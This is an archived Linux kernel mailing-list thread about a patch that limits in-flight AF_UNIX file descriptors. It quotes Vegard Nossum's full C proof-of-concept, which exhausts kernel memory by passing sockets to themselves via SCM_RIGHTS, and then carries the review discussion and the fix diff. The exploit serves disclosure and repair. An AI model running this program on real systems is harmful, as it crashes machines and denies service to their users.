Patchwork af_unix: limit unix_tot_inflight

Submitter Eric Dumazet
Date Nov. 24, 2010, 9:18 a.m.
Message ID <1290590335.3464.24.camel@edumazet-laptop>
Permalink /patch/72823/
State Accepted
Delegated to: David Miller

Comments

Eric Dumazet - Nov. 24, 2010, 9:18 a.m.
On Wednesday 24 November 2010 at 00:11 +0100, Eric Dumazet wrote:
> On Tuesday 23 November 2010 at 23:21 +0100, Vegard Nossum wrote:
> > Hi,
> > 
> > I found this program lying around on my laptop. It kills my box
> > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > kernel, so the process doesn't get killed by the OOM killer). As far
> > as I can tell, the memory isn't being freed when the program exits
> > either. Maybe it will eventually get cleaned up by the UNIX socket
> > garbage collector, but in that case it doesn't get called
> > quickly enough to save my machine.
> > 
> > #include <sys/mount.h>
> > #include <sys/socket.h>
> > #include <sys/un.h>
> > #include <sys/wait.h>
> > 
> > #include <errno.h>
> > #include <fcntl.h>
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> > 
> > static int send_fd(int unix_fd, int fd)
> > {
> >         struct msghdr msgh;
> >         struct cmsghdr *cmsg;
> >         char buf[CMSG_SPACE(sizeof(fd))];
> > 
> >         memset(&msgh, 0, sizeof(msgh));
> > 
> >         memset(buf, 0, sizeof(buf));
> >         msgh.msg_control = buf;
> >         msgh.msg_controllen = sizeof(buf);
> > 
> >         cmsg = CMSG_FIRSTHDR(&msgh);
> >         cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> >         cmsg->cmsg_level = SOL_SOCKET;
> >         cmsg->cmsg_type = SCM_RIGHTS;
> > 
> >         msgh.msg_controllen = cmsg->cmsg_len;
> > 
> >         memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> >         return sendmsg(unix_fd, &msgh, 0);
> > }
> > 
> > int main(int argc, char *argv[])
> > {
> >         while (1) {
> >                 pid_t child;
> > 
> >                 child = fork();
> >                 if (child == -1)
> >                         exit(EXIT_FAILURE);
> > 
> >                 if (child == 0) {
> >                         int fd[2];
> >                         int i;
> > 
> >                         if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> >                                 goto out_error;
> > 
> >                         for (i = 0; i < 100; ++i) {
> >                                 if (send_fd(fd[0], fd[0]) == -1)
> >                                         goto out_error;
> > 
> >                                 if (send_fd(fd[1], fd[1]) == -1)
> >                                         goto out_error;
> >                         }
> > 
> >                         close(fd[0]);
> >                         close(fd[1]);
> >                         goto out;
> > 
> >                 out_error:
> >                         fprintf(stderr, "error: %s\n", strerror(errno));
> >                 out:
> >                         exit(EXIT_SUCCESS);
> >                 }
> > 
> >                 while (1) {
> >                         pid_t kid;
> >                         int status;
> > 
> >                         kid = wait(&status);
> >                         if (kid == -1) {
> >                                 if (errno == ECHILD)
> >                                         break;
> >                                 if (errno == EINTR)
> >                                         continue;
> > 
> >                                 exit(EXIT_FAILURE);
> >                         }
> > 
> >                         if (WIFEXITED(status)) {
> >                                 if (WEXITSTATUS(status))
> >                                         exit(WEXITSTATUS(status));
> >                                 break;
> >                         }
> >                 }
> >         }
> > 
> >         return EXIT_SUCCESS;
> > }
> > 
> > 
> > Vegard
> > --

Here is a patch to address this problem.

Thanks

[PATCH] af_unix: limit unix_tot_inflight

Vegard Nossum found that a unix socket OOM was possible and posted an
exploit program.

My analysis is that we can eat all LOWMEM memory before unix_gc() is
called from unix_release_sock(). Moreover, the thread blocked in
unix_gc() can take a huge amount of time to perform cleanup because of
the huge working set.

One way to handle this is to have a sensible limit on unix_tot_inflight,
tested from wait_for_unix_gc(), and to force a call to unix_gc() if this
limit is hit.

This solves the OOM and also reduces overall latencies, and should not
slow down normal workloads.

Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Eugene Teo <eugene@redhat.com>
---
 net/unix/garbage.c |    7 +++++++
 1 files changed, 7 insertions(+)



--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Andi Kleen - Nov. 24, 2010, 2:44 p.m.
Eric Dumazet <eric.dumazet@gmail.com> writes:
>
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
>  }
>  
>  static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000

It would be better to define this as a percentage of
lowmem.

-Andi
Eric Dumazet - Nov. 24, 2010, 3:18 p.m.
On Wednesday 24 November 2010 at 15:44 +0100, Andi Kleen wrote:
> Eric Dumazet <eric.dumazet@gmail.com> writes:
> >
> > diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> > index c8df6fd..40df93d 100644
> > --- a/net/unix/garbage.c
> > +++ b/net/unix/garbage.c
> > @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> >  }
> >  
> >  static bool gc_in_progress = false;
> > +#define UNIX_INFLIGHT_TRIGGER_GC 16000
> 
> It would be better to define this as a percentage of
> lowmem.
> 

I knew somebody would suggest this ;)

Hmm, why bother?

Do you think 16000 is too big? Too small?

1) What would the percentage of memory be? 1%? 0.001%?

  On a 16TB machine, a percentage would still give huge latencies to the
poor guy who hits unix_gc().

With 16000, the max latency I measured was 11.5 ms (on an Intel E5540
@ 2.53GHz), instead of more than 2000 ms.

I guess it would make more sense to limit it to the size of the CPU cache
anyway.


2) We currently allocate 4096 bytes (on x86_64) to store one file
pointer, or 2048 bytes on x86_32.

But that allocation can hold up to 255 files.

 I posted a patch to shrink this to 32 or 16 bytes. Should we then
change the heuristic?

3) Really, who needs more than 16000 inflight unix files?

  (Inflight unix files are af_unix file descriptors that were sent
(SCM_RIGHTS) through af_unix and not yet garbage collected.)


4) If we autotune a limit at boot time as a lowmem percentage, some people
will then want a /proc/sys/net/core/max_unix_inflight sysctl, just for
completeness. One extra sysctl...

I can't see any valid uses other than programs designed to stress our stack.



Andi Kleen - Nov. 24, 2010, 4:25 p.m.
> I knew somebody would suggest this ;)
> 
> Hmm, why bother?
> 
> Do you think 16000 is too big? Too small?

I just don't like static limits. Traditionally even the ones
that seemed reasonable at some point were hit by someone
years later.

The latency issue you mention is a valid concern. I guess
an incremental GC would be overkill here ...

-Andi
David Miller - Nov. 24, 2010, 5:14 p.m.
From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 24 Nov 2010 16:18:26 +0100

> 4) If we autotune a limit at boot time as a lowmem percentage, some people
> will then want a /proc/sys/net/core/max_unix_inflight sysctl, just for
> completeness. One extra sysctl...
> 
> I can't see any valid uses other than programs designed to stress our stack.

I agree completely with Eric's analysis.

I would even consider setting this threshold lower. :-)

Anyways, consider Eric's patch applied.
Michal Hocko - Nov. 26, 2010, 8:50 a.m.
Shouldn't this go to stable?
AFAICS 2.6.32 contains the same code (the patch applies). 
I haven't tried to reproduce the issue yet.

David Miller - Nov. 27, 2010, 2:27 a.m.
From: Michal Hocko <mhocko@suse.cz>
Date: Fri, 26 Nov 2010 09:50:00 +0100

> Shouldn't this go to stable?
> AFAICS 2.6.32 contains the same code (the patch applies). 
> I haven't tried to reproduce the issue yet.

I'll submit it to all the stable branches after this patch (and the
other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
least half a week or so.
Michal Hocko - Nov. 29, 2010, 10:37 a.m.
On Fri 26-11-10 18:27:14, David Miller wrote:
> From: Michal Hocko <mhocko@suse.cz>
> Date: Fri, 26 Nov 2010 09:50:00 +0100
> 
> > Shouldn't this go to stable?
> > AFAICS 2.6.32 contains the same code (the patch applies). 
> > I haven't tried to reproduce the issue yet.
> 
> I'll submit it to all the stable branches after this patch (and the
> other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
> least half a week or so.

OK, thanks!

Patch

diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index c8df6fd..40df93d 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -259,9 +259,16 @@  static void inc_inflight_move_tail(struct unix_sock *u)
 }
 
 static bool gc_in_progress = false;
+#define UNIX_INFLIGHT_TRIGGER_GC 16000
 
 void wait_for_unix_gc(void)
 {
+	/*
+	 * If number of inflight sockets is insane,
+	 * force a garbage collect right now.
+	 */
+	if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
+		unix_gc();
 	wait_event(unix_gc_wait, gc_in_progress == false);
 }